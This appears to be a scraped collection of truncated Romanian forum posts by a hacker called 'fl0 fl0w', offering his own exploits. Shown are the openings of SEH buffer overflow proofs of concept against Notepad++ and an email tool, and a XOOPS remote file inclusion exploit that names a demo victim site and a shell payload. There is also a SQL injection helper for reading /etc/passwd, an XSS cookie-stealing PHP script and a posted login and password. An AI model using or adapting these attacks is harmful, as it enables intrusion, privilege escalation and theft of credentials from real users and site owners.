fl0 fl0w

# Buffer overflow simplu cand deschizi un fisier .png special un SEH handler este suprascris, # apoi trebuie decat sa scot 8 bytes din stack,si RET instructiune ce imi pune ultimi 4 bytes # in EIP ,acesti 4 bytes o sa fie o instructiune JMP 10 bytes peste zona corrupta pe [nop] si apoi [shellcode]. # Video test 0day # Download phtst.rar Cod: cpp private pastebin - collaborative debugging tool

Asta e important si pentru voi. /* ************************************************************** (0day)Notepad++ 5.4.5 Local .C/CPP Stack Buffer Overflow POC* by fl0 fl0w * ************************************************************** */ /***************************************************************************************************** LATEST FIXES * Notepad++ v5.4.5 fixed bugs (from v5.4.4) :

My new exploit . Pentru mai multe detalii privind debugging, am pus screenshoturi si altele http://rapidshare.com/files/279955517/Portable_E.M_Magic_Morph_1.95b_Buffer_Overflow.zip.html http://www.2shared.com/file/7794630/5e98eb46/Portable_EM_Magic_Morph_195b_Buffer_Overflow.html http://www.turboupload.com/2y6snh3b5fad/Portable_E.M_Magic_Morph_1.95b_Buffer_Overflow.zip.html Acest buffer overflow este 100% exploatabil rezultand in executie de cod pe un target capatand astfel drepturi de ADMIN pornind de la statusul de USER. Partea cea mai dificila este programarea shellcodului ,deoarece soft

Salut bro's ,got 0F**gday /*0day HTML Email Creator & Sender v2.3 Local Buffer Overflow(Seh) Poc ******************************************************************** Debugging info Seh handler is overwriten , the offset is at 60 bytes in our buffer so you have to build your buffer as follows: [PONTER TO NEXT SEH]-------[SEH HANDLER]----[NOP]------[SHELLCODE] | | | | JMP 4 bytes POP POP RET 50*0x90 calc.exe ****************************************************************

demo video http://www.filefactory.com/file/afg57be/n/orbit_test_avi http://www.sendspace.com/file/uyu8qi http://files.filefront.com/orbit+testavi/;13220935;/fileinfo.html #include <stdio.h> #include <stdlib.h> #include <string.h> #include <windows.h> #define SIZE 10000 #define OFFSET 504 void file (char * , char *); void write (char *, int ,char *); void print (); void usage (char *); void target (); /*tnx Metasploit for Shellcodes*/ //LAUNCH CALC.EXE char shellcode_1[] =

Preview http://rapidshare.com/files/92994953/1.bmp.html DW http://www.pagegangster.com/shop/publications/view/15521/ Cere sa te autentifici ,logati-va cu datele astea sa o rasfoiti.. Username: flo_flow_supremacy Password: 4319 O colaborare in nr 4 fratilor.. DW link http://rapidshare.com/files/93400638/Co0de-Magazine-NR3.pdf.html

#!/usr/bin/perl#You can get admin hash,or acces the pass file from the *NIx #with the generated strings with the generator.c program #you have to put in sql specific comands,my example is for #tables and *NIX pass #exploit tested on winxp sp2 # #include<stdio.h> # #include<stdlib.h> # #include<string.h> # int main() # { char st[1024]; # int le; # printf("Input : "); # gets(st); # for(le=0;le<strlen(st);le++) # { printf("%d,",st[le]); # } # system("pause"); # return 0; # } #101,116,99,47,112,97,115,115,119,100 = /etc/passwd #If we would do this : #http:/

#!/usr/bin/perl sub header() { print q { ========================================================================= XOOPS modules xfsection 1.01 =>Remote File Inclusion Exploit Exploit Coded by fl0 fl0w flo_flow_supremacy[at]yahoo[dot]com PoC:http://site.com/modules/xfsection/modify.php?dir_module=evilShell? Demo:http://www.homu.net/modules/xfsection/modify.php?dir_module=SHELL? ========================================================================= } } sub routine() { header(); print q { ======================================================================

EN Version. http://rapidshare.com/files/35582872/The_most_used_methods_to_penetrate_a_web_server_By_fl0_fl0w_.pdf.html

Hacking'ul nu se poate defini ,hacking is a state of mind.Un hacker este o persoana care exploateaza fiecare detaliu a unui sistem de calcul si care prin programare inbunatateste codurile.

Da ,da cum sa nu ..asa e .Probabil ai stat vreo 3 saptamani ca sa iti dai seama ..de cand l-am pus.

Vrajeala ,nu ai facut nimic decat sa iti scoti limitarea de 80% de pe bandswitch care oricum era folosita in regim de 'urgenta'. Bullshit!

Pentru a exploata un site vulnerabil trebuie sa injectezi scripturi pentru a culege user imput.Pentru cookiuri la fel trebuie sa folosesti un limbaj de scripting in primul rand ,logic si inainte sa testezi. Testezi cu un alert ,apoi treci la lucru. Faci o cerere GET catre locul unde sunt stocate : ['cookie'] ,copiezi intr-o variabila cea ce gasesti,apoi directionezi acel continut undeva. Faci o schema URL ,apoi si o postezi in forumul ,guesstbook'ul ,site'ul respectiv. Un astfel de script arata : O sa folosesc php. <?php $a=$_GET('cookie'); $b=fopen("cookies.txt","c"); fwri

@Spy_bit pt ca am luat cu /vbulletin si nu trebuia ,am vazut dupa.Documenteaza-te despre anonimitate si navigare pe internet,servere proxy etc inainte sa intrebi chestii de genul asta.

Am pus si active perl ,mplayer se vede cel mai bine. http://rapidshare.com/files/31089970/video_tutorial.fl0.fl0w.rar.html